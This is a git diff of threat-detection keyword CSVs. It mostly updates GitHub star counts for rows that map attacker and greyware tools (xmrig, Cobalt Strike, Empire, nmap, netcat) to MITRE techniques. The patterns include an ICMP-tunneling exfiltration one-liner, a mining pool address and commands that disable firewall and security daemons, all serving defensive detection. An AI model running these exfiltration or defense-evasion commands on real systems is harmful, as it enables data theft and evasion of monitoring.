-"*xmrig-*-bionic-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig-*-focal-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig-*-freebsd-static-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig-*-linux-static-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig-*-linux-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig-*-macos-arm64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig-*-macos-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig-*-msvc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrig.exe -*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" -"*xmrpool.eu:3333*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-bionic-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-focal-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-freebsd-static-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-linux-static-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-linux-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-macos-arm64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-macos-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig-*-msvc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrig.exe -*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*xmrpool.eu:3333*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*xxd -p -c 4 /* | while read line* do ping -c 1 -p *","greyware_tool_keyword","xxd","ICMP Tunneling One Liner","T1090 - T1002 - T1016","TA0011 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*zenmap.exe*","greyware_tool_keyword","nmap","When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. and potential vulnerabilities in target systems.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*zmap -*","greyware_tool_keyword","nmap","ZMap is a fast single packet network scanner designed for Internet-wide network surveys. On a typical desktop computer with a gigabit Ethernet connection. ZMap is capable scanning the entire public IPv4 address space in under 45 minutes. With a 10gigE connection and PF_RING. ZMap can scan the IPv4 address space in under 5 minutes. ZMap operates on GNU/Linux. Mac OS. and BSD. ZMap currently has fully implemented probe modules for TCP SYN scans. ICMP. DNS queries. UPnP. BACNET. and can send a large number of UDP probes. If you are looking to do more involved scans. e.g.. banner grab or TLS handshake. take a look at ZGrab. ZMaps sister project that performs stateful application-layer handshakes.","T1046 - T1065 - T1210.002 - T1095 - T1040","TA0002 - TA0007 - TA0008 - TA0011 - TA0001","N/A","N/A","Vulnerability scanner","https://github.com/zmap/zmap","1","0","greyware tool - risks of False positive !","N/A","10","5009","887","2023-09-26T15:13:35Z","2013-01-23T01:30:09Z" +"*zmap -*","greyware_tool_keyword","nmap","ZMap is a fast single packet network scanner designed for Internet-wide network surveys. On a typical desktop computer with a gigabit Ethernet connection. ZMap is capable scanning the entire public IPv4 address space in under 45 minutes. With a 10gigE connection and PF_RING. ZMap can scan the IPv4 address space in under 5 minutes. ZMap operates on GNU/Linux. Mac OS. and BSD. ZMap currently has fully implemented probe modules for TCP SYN scans. ICMP. DNS queries. UPnP. BACNET. and can send a large number of UDP probes. If you are looking to do more involved scans. e.g.. banner grab or TLS handshake. take a look at ZGrab. ZMaps sister project that performs stateful application-layer handshakes.","T1046 - T1065 - T1210.002 - T1095 - T1040","TA0002 - TA0007 - TA0008 - TA0011 - TA0001","N/A","N/A","Vulnerability scanner","https://github.com/zmap/zmap","1","0","greyware tool - risks of False positive !","N/A","10","5011","887","2023-09-26T15:13:35Z","2013-01-23T01:30:09Z" "capinfos -*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "captype -*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "chkconfig off ip6tables","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1170,7 +1210,7 @@ "Get-NetGroup -FullData*","greyware_tool_keyword","powershell","Find groups in the current domain (PowerView)","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "ldapsearch -h * -x*","greyware_tool_keyword","ldapsearch","ldapsearch to enumerate ldap","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://man7.org/linux/man-pages/man1/ldapsearch.1.html","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "nc -vz *","greyware_tool_keyword","netcat","Netcat is a featured networking utility which reads and writes data across network connections. using the TCP/IP protocol It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time. it is a feature-rich network debugging and exploration tool. since it can create almost any kind of connection you would need and has several interesting built-in capabilities","T1043 - T1052 - T1071 - T1095 - T1132 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","http://netcat.sourceforge.net/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"nmap *","greyware_tool_keyword","nmap","A very common tool. Network host vuln and port detector.","T1046 - T1065 - T1202 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Information Gathering","https://github.com/nmap/nmap","1","0","greyware tool - risks of False positive !","N/A","10","8299","2206","2023-09-29T08:27:35Z","2012-03-09T14:47:43Z" +"nmap *","greyware_tool_keyword","nmap","A very common tool. Network host vuln and port detector.","T1046 - T1065 - T1202 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Information Gathering","https://github.com/nmap/nmap","1","0","greyware tool - risks of False positive !","N/A","10","8301","2206","2023-09-29T08:27:35Z","2012-03-09T14:47:43Z" "rawshark -*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "rpcclient -*","greyware_tool_keyword","rpcclient","tool for executing client side MS-RPC functions","T1021.006 - T1049","TA0002 - TA0009","N/A","N/A","Lateral movement","https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html","1","0","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A" "schkconfig off cbdaemon","greyware_tool_keyword","shell","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" diff --git a/offensive_tool_keyword.csv b/offensive_tool_keyword.csv index 348cc0869..7ceef7cc0 100644 --- a/offensive_tool_keyword.csv +++ b/offensive_tool_keyword.csv @@ -1,70 +1,70 @@ "keyword","metadata_keyword_type","metadata_tool","metadata_description","metadata_tool_techniques","metadata_tool_tactics","metadata_malwares_name","metadata_groups_name","metadata_category","metadata_link","metadata_enable_endpoint_detection","metadata_enable_proxy_detection","metadata_comment","metadata_severity_score","metadata_popularity_score","metadata_github_stars","metadata_github_forks","metadata_github_updated_at","metadata_github_created_at" "* - Sensitive Accounts.csv*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "* - ShadowSpray*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" -"* $exploit_oneliner*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"* $FodHelperPath*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-FodHelperBypass.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* $lse_find_opts *","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"* $payload_oneliner *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"* * 0x* - HOOK DETECTED*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"* $exploit_oneliner*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"* $FodHelperPath*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-FodHelperBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* $lse_find_opts *","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"* $payload_oneliner *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"* * 0x* - HOOK DETECTED*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "* */lsass.o*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "* ./sf.py -l 127.0.0.1:5001*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "* ./tor.keyring *","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* .\tor.keyring *","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* .beacon_keys -*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"* .beacon_keys -*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 